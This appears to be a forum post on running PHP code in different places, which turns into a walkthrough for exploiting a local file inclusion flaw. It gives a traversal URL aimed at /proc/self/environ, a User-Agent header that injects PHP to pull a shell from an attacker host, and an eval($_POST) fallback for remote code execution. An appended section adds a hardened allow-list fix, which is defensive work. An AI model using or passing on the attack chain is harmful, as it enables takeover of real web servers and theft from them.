You can run php in various ways on whatever machine that has php installed. The main thing is that the code will run on a machine that has it installed, the actual location of the code doesn't matter all that much depending on the context.
You could for instance install php on your home machine and start from the command line like:
php somephpfile.php
Or you could also have a webserver installed with php support and simply go to the appropriate url like:
http://127.0.0.1/somephpfile.php
Or on a remote server with php installed there could be a php script that includes other php code and the php installed on that server has been configured to allow remote includes like:
<?php include 'http://somewebsite.tld/somedir/somefile.php'; ?>
(Note that somewebsite.tld/.... needs to show the content of that php file and not actually run it itself. It doesn't even really need to end in .php; it might as well be a .txt.)
Or there might be some php code on a machine that allows you to evaluate php code and allows you to specify a string of php code like:
<?php eval($_GET['code']); ?>
Now to throw all this together into a practical example. There might be a php script somewhere that is vulnerable to a local file inclusion (lfi). It might look something like this:
<?php include '/usr/local/www/'.$_GET['page'].'.php';
Now we could change the 'page' get value to whatever we want fairly easily by just going to some url like:
http://somewebsite.tld/vulnpage.php?page=../../../proc/self/environ%00
Then the vuln page will try to include /proc/self/environ. (Note the nullbyte at the end to get rid of that pesky .php.)
Now if we were to also change our useragent to something like:
<?php include 'evilwebsite.tld/somephpshell.txt'; ?>
Then the vuln page will include /proc/self/environ, which for a web process also contains the user agent, which will in turn be treated as php code and will include somephpshell.txt (assuming remote includes are turned on). If somephpshell.txt is the code for a random php shell then you now have a nice interface to whatever server that had the lfi as whatever user the webserver is running as.
Now if remote includes are not allowed then you could always turn your useragent into something like:
<?php eval($_POST['evilcodez']); ?>
and set the post value of 'evilcodez' to the content of the shellscript. Or alternatively you write a little something to get the shellscript from some server (http_get() comes to mind, but if remote includes are disabled then there's a big chance that is disabled as well).
There you have it, various ways of running php in all kinds of situations with the actual code being in all kinds of different places. Hope this helped.
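A hardened form of the `include` from the LFI example above, added here as an example and not part of the original post. It maps the `page` value through a strict allow-list and confirms the resolved path stays under the web root, so traversal sequences, null bytes and `/proc/self/environ` never reach `include`. The names `resolve_page()`, `PAGE_ROOT`, `ALLOWED_PAGES` and the listed page names are assumptions made for illustration.

```php
<?php
// Added example (not the original poster's code).
// PAGE_ROOT matches the directory used in the vulnerable snippet above;
// ALLOWED_PAGES is a constructed sample list of legitimate page names.
const PAGE_ROOT = '/usr/local/www';
const ALLOWED_PAGES = ['home', 'about', 'contact'];

/**
 * Return the absolute path of the page to include, or null if the
 * request does not name a known page. (Hypothetical helper.)
 */
function resolve_page($requested, string $root = PAGE_ROOT, array $allowed = ALLOWED_PAGES): ?string
{
    // Reject missing values and array input such as ?page[]=x.
    if (!is_string($requested)) {
        return null;
    }
    // Exact, type-strict match only: "../../../proc/self/environ\0"
    // or any other unlisted value fails here.
    if (!in_array($requested, $allowed, true)) {
        return null;
    }
    // Defence in depth: resolve symlinks and confirm the file really
    // lives under the web root before it is handed to include.
    $rootReal = realpath($root);
    $path = realpath($root . '/' . $requested . '.php');
    if ($rootReal === false || $path === false) {
        return null;
    }
    $prefix = $rootReal . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

$page = resolve_page($_GET['page'] ?? null);
if ($page === null) {
    http_response_code(404);
    exit;
}
include $page;

// php.ini, for the remote-include case described above:
//   allow_url_include = Off
```

With the allow-list in place the User-Agent header can still carry PHP source into the process environment, but no request can make the script include that file.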